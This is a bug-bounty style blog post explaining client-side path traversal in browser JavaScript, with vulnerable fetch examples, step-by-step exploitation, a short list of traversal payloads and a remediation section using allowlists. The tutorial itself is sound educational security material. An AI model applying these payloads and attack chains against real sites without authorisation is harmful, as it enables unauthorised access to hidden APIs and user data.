Alright, let's talk about a bug that sounds boring… but can actually be πŸ”₯ very spicy in bug bounty programs β€” CSPT (Client-Side Path Traversal).

If you've ever thought "Path traversal is just ../../etc/passwd, right?" β€” yeah… that's server-side. CSPT is its sneaky cousin that lives in the browser and quietly causes chaos 😈

🧠 What is CSPT?

Client-Side Path Traversal (CSPT) happens when JavaScript running in the browser constructs URLs using user-controlled input, without proper sanitization.

πŸ‘‰ Instead of the server resolving paths, the browser builds and sends unintended requests.

πŸ’‘ Simple idea:

The app thinks it's requesting:

/api/users/profile

But you trick it into requesting:

/api/admin/secrets

And boom πŸ’₯ β€” unintended access.

βš™οΈ How CSPT Happens

Most modern apps use JavaScript like this:

fetch(`/api/${endpoint}`)

Looks innocent, right? πŸ˜‡

But if endpoint is user-controlled…

endpoint = "../../admin/secrets"

Now the browser requests:

/api/../../admin/secrets

Which resolves to:

/admin/secrets

🎯 Congrats β€” you just bypassed intended API structure.

πŸͺœ Step-by-Step Exploitation

1️⃣ Find a dynamic request

Look for places where JS builds URLs:

fetch(`/api/posts/${postId}`)

2️⃣ Check if input is controllable

Can you control postId via:

  • URL parameters
  • Hash fragments
  • Input fields
  • Local storage

Example:

https://target.com/?postId=123

3️⃣ Inject traversal payload

Try:

../../admin

So request becomes:

/api/posts/../../admin

Browser resolves it to:

/admin

😏 Sneaky, right?

πŸ”₯ Real Example

Original JS:

const file = new URLSearchParams(location.search).get("file");
fetch(`/static/${file}`);

You send:

?file=../../api/admin/users

Browser sends request:

/static/../../api/admin/users

➑️ Final request:

/api/admin/users

πŸŽ‰ You just accessed an internal API!

😈 Why CSPT is Dangerous

CSPT alone is cool… but chained? Chef's kiss πŸ‘¨β€πŸ³πŸ’‹

πŸ”— Attack chains:

1. Access Hidden APIs

Endpoints not exposed in UI suddenly become reachable.

2. Bypass Frontend Restrictions

Frontend says:

"You are not admin 😑R&quo;

But CSPT says:

"I go where I want 😎R&quo;

3. Steal Sensitive Data

If responses are readable:

  • user data
  • tokens
  • configs

4. Combine with CORS Misconfig

If CORS is weak: πŸ‘‰ Data exfiltration becomes possible.

5. Abuse SSRF-like behavior

You may trick frontend into calling internal endpoints.

πŸ§ͺ Testing Tips (Bug Hunter Mode πŸ•΅οΈβ€β™‚οΈ)

πŸ” Where to look:

  • fetch()
  • axios()
  • XMLHttpRequest
  • Dynamic imports
  • File loaders

πŸ’₯ Payloads to try:

../../
../../../
..%2f
..%252f

🧠 Pro Tip:

Always check:

  • Network tab (DevTools) πŸ‘€
  • See actual requests being sent

🧩 CSPT vs Server-Side Path Traversal

FeatureCSPTServer-sideRuns inBrowserServerImpactAPI abuseFile accessVisibilityEasy (DevTools)HiddenExploit styleURL manipulationFile system traversal

πŸ›‘οΈ How to Fix (for devs lurking πŸ‘€)

❌ Bad:

fetch(`/api/${userInput}`)

βœ… Good:

  • Validate input strictly
  • Use allowlists:
const allowed = ["profile", "posts"];
if (!allowed.includes(userInput)) return;
  • Avoid direct concatenation

πŸ˜‚ Final Thoughts

CSPT is like:

"Frontend said no… but browser said yes 😏R&quo;

It's often overlooked because:

  • It's not "classic"
  • It lives in JavaScript
  • People underestimate frontend bugs

But in bug bounty… πŸ‘‰ We don't ignore weird bugs. We weaponize them 😎